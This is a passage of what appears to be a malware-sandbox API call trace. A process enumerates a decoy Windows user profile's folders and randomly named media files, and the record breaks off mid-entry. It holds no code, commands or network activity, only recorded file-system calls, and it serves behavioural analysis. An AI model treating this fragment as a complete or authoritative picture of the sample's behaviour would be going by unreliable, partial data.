RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.746] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.746] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.746] PathFindFileNameW (pszPath="") returned="" [0180.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.746] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\links\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.747] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.747] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.747] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0180.747] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0180.747] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0180.747] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0180.747] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0180.747] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.747] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0180.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.747] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Local Settings\\") returned="Local Settings\\" [0180.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.747] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.747] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.747] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.747] PathFindFileNameW (pszPath="") returned="" [0180.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0180.748] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\*" (normalized: "c:\\users\\keecfmwgj\\local settings\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0180.749] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.749] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0180.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.749] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.749] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.749] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.749] PathFindFileNameW (pszPath="") returned="" [0180.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.749] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\*" (normalized: "c:\\users\\keecfmwgj\\music\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26350e0, ftCreationTime.dwHighDateTime=0x1d8a4c7, ftLastAccessTime.dwLowDateTime=0x9e0041c0, ftLastAccessTime.dwHighDateTime=0x1d8a585, ftLastWriteTime.dwLowDateTime=0x9e0041c0, ftLastWriteTime.dwHighDateTime=0x1d8a585, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="26hKDH", cAlternateFileName="")) returned 1 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ec70 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49396f90, ftCreationTime.dwHighDateTime=0x1d8a10c, ftLastAccessTime.dwLowDateTime=0x2809600, ftLastAccessTime.dwHighDateTime=0x1d8a11b, ftLastWriteTime.dwLowDateTime=0x2809600, ftLastWriteTime.dwHighDateTime=0x1d8a11b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5U0VVnc3NrOc8n_Z", cAlternateFileName="5U0VVN~1")) returned 1 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ecd8 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75326790, ftCreationTime.dwHighDateTime=0x1d89da2, ftLastAccessTime.dwLowDateTime=0x2f70c9e0, ftLastAccessTime.dwHighDateTime=0x1d8a6b2, ftLastWriteTime.dwLowDateTime=0x2f70c9e0, ftLastWriteTime.dwHighDateTime=0x1d8a6b2, nFileSizeHigh=0x0, nFileSizeLow=0x7fe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="85NDX4GNPa9.m4a", cAlternateFileName="85NDX4~1.M4A")) returned 1 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1356710, ftCreationTime.dwHighDateTime=0x1d89704, ftLastAccessTime.dwLowDateTime=0x13094d70, ftLastAccessTime.dwHighDateTime=0x1d89e62, ftLastWriteTime.dwLowDateTime=0x13094d70, ftLastWriteTime.dwHighDateTime=0x1d89e62, nFileSizeHigh=0x0, nFileSizeLow=0xf219, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9QfI6h6W74ZaGdKZ7l.m4a", cAlternateFileName="9QFI6H~1.M4A")) returned 1 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e80a6a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c950, ftCreationTime.dwHighDateTime=0x1d89a70, ftLastAccessTime.dwLowDateTime=0xcd597b10, ftLastAccessTime.dwHighDateTime=0x1d8a5a5, ftLastWriteTime.dwLowDateTime=0xcd597b10, ftLastWriteTime.dwHighDateTime=0x1d8a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Eb_B9k_JDAVxhXh0", cAlternateFileName="EB_B9K~1")) returned 1 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j ucK2lALp_iPp", cAlternateFileName="JUCK2L~1")) returned 1 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a404d0 [0180.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x3456d8 [0180.750] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j ucK2lALp_iPp", cAlternateFileName="JUCK2L~1")) returned 0 [0180.750] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.751] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40688 [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.751] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\My Documents\\") returned="My Documents\\" [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.751] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.751] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.751] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.751] PathFindFileNameW (pszPath="") returned="" [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40688 [0180.751] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\My Documents\\*" (normalized: "c:\\users\\keecfmwgj\\my documents\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j ucK2lALp_iPp", cAlternateFileName="JUCK2L~1")) returned 0xffffffff [0180.751] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.751] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\NetHood\\") returned="NetHood\\" [0180.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.752] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.752] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.752] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.752] PathFindFileNameW (pszPath="") returned="" [0180.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.752] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\NetHood\\*" (normalized: "c:\\users\\keecfmwgj\\nethood\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j ucK2lALp_iPp", cAlternateFileName="JUCK2L~1")) returned 0xffffffff [0180.752] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.752] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\") returned="OneDrive\\" [0180.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.752] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.752] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.752] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.753] PathFindFileNameW (pszPath="") returned="" [0180.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.753] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\*" (normalized: "c:\\users\\keecfmwgj\\onedrive\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.754] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.754] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.754] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0180.754] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.754] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.754] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0180.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.754] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.755] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.755] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.755] PathFindFileNameW (pszPath="") returned="" [0180.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0180.755] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x995cf350, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x995cf350, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.755] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x995cf350, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x995cf350, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x418ef930, ftCreationTime.dwHighDateTime=0x1d8a35b, ftLastAccessTime.dwLowDateTime=0x7c0d2a90, ftLastAccessTime.dwHighDateTime=0x1d8a456, ftLastWriteTime.dwLowDateTime=0x7c0d2a90, ftLastWriteTime.dwHighDateTime=0x1d8a456, nFileSizeHigh=0x0, nFileSizeLow=0x2c53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-ctDCbmthLRz.jpg", cAlternateFileName="-CTDCB~1.JPG")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb39b4f80, ftCreationTime.dwHighDateTime=0x1d89f80, ftLastAccessTime.dwLowDateTime=0x2d1be120, ftLastAccessTime.dwHighDateTime=0x1d89fd2, ftLastWriteTime.dwLowDateTime=0x2d1be120, ftLastWriteTime.dwHighDateTime=0x1d89fd2, nFileSizeHigh=0x0, nFileSizeLow=0x9e1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3UVY.jpg", cAlternateFileName="")) returned 1 [0180.756] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50410370, ftCreationTime.dwHighDateTime=0x1d89d42, ftLastAccessTime.dwLowDateTime=0xc5b768e0, ftLastAccessTime.dwHighDateTime=0x1d8a622, ftLastWriteTime.dwLowDateTime=0xc5b768e0, ftLastWriteTime.dwHighDateTime=0x1d8a622, nFileSizeHigh=0x0, nFileSizeLow=0x15bb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5KliNx-drvR8.bmp", 